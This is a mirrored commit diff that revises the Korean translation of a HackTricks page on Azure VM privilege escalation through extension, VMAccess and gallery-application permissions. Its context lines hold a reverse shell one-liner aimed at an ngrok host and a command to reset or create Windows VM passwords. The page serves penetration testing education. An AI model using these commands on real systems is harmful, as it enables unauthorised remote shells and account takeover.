mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-07-28 22:51:09 -07:00
Translated ['src/pentesting-cloud/azure-security/az-privilege-escalation
This commit is contained in:
+7
-7
@@ -12,13 +12,13 @@ Azure Virtual Machines 및 Network에 대한 자세한 정보는 다음을 확
|
||||
|
||||
### **`Microsoft.Compute/virtualMachines/extensions/write`**
|
||||
|
||||
이 권한은 가상 머신에서 확장을 실행할 수 있게 하며, 이를 통해 **임의의 코드를 실행할 수 있습니다**.\
|
||||
이 권한은 가상 머신에서 확장을 실행할 수 있게 하여 **임의의 코드를 실행할 수 있게 합니다**.\
|
||||
VM에서 임의의 명령을 실행하기 위해 사용자 정의 확장을 악용하는 예:
|
||||
|
||||
{{#tabs }}
|
||||
{{#tab name="Linux" }}
|
||||
|
||||
- 리버스 쉘 실행
|
||||
- 리버스 셸 실행
|
||||
```bash
|
||||
# Prepare the rev shell
|
||||
echo -n 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/13215 0>&1' | base64
|
||||
@@ -91,9 +91,9 @@ Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Na
|
||||
|
||||
<details>
|
||||
|
||||
<summary>VMAccess 확장</summary>
|
||||
<summary>VMAccess extension</summary>
|
||||
|
||||
이 확장은 Windows VM 내의 사용자 비밀번호를 수정(또는 존재하지 않는 경우 생성)할 수 있게 해줍니다.
|
||||
이 확장은 Windows VM 내의 사용자 비밀번호를 수정(또는 존재하지 않을 경우 생성)할 수 있게 해줍니다.
|
||||
```bash
|
||||
# Run VMAccess extension to reset the password
|
||||
$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
|
||||
@@ -157,13 +157,13 @@ Set-AzVMDscExtension `
|
||||
|
||||
<summary>하이브리드 런북 워커</summary>
|
||||
|
||||
이것은 자동화 계정에서 VM에서 런북을 실행할 수 있도록 하는 VM 확장입니다. 더 많은 정보는 [Automation Accounts service](../az-services/az-automation-account/index.html)를 확인하세요.
|
||||
이것은 자동화 계정에서 VM에서 런북을 실행할 수 있도록 하는 VM 확장입니다. 자세한 내용은 [Automation Accounts service](../az-services/az-automation-account/index.html)를 확인하세요.
|
||||
|
||||
</details>
|
||||
|
||||
### `Microsoft.Compute/disks/write, Microsoft.Network/networkInterfaces/join/action, Microsoft.Compute/virtualMachines/write, (Microsoft.Compute/galleries/applications/write, Microsoft.Compute/galleries/applications/versions/write)`
|
||||
|
||||
이것들은 **새로운 갤러리 애플리케이션을 생성하고 VM 내에서 실행하기 위한 필수 권한**입니다. 갤러리 애플리케이션은 무엇이든 실행할 수 있으므로 공격자는 이를 악용하여 임의의 명령을 실행하는 VM 인스턴스를 손상시킬 수 있습니다.
|
||||
이것들은 **새 갤러리 애플리케이션을 생성하고 VM 내에서 실행하기 위해 필요한 권한**입니다. 갤러리 애플리케이션은 무엇이든 실행할 수 있으므로 공격자는 이를 악용하여 임의의 명령을 실행하는 VM 인스턴스를 손상시킬 수 있습니다.
|
||||
|
||||
마지막 2개의 권한은 애플리케이션을 테넌트와 공유함으로써 회피할 수 있습니다.
|
||||
|
||||
@@ -351,6 +351,6 @@ https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/
|
||||
|
||||
### TODO: Microsoft.Compute/virtualMachines/WACloginAsAdmin/action
|
||||
|
||||
[**문서**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute)에 따르면, 이 권한은 Windows Admin Center를 통해 리소스의 OS를 관리할 수 있게 해줍니다. 따라서 이는 WAC에 대한 액세스를 제공하여 VM을 제어할 수 있는 것처럼 보입니다...
|
||||
[**문서**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute)에 따르면, 이 권한은 Windows Admin Center를 통해 리소스의 OS를 관리자 권한으로 관리할 수 있게 해줍니다. 따라서 이는 WAC에 대한 접근을 제공하여 VM을 제어할 수 있게 하는 것 같습니다...
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
Reference in New Issue
Block a user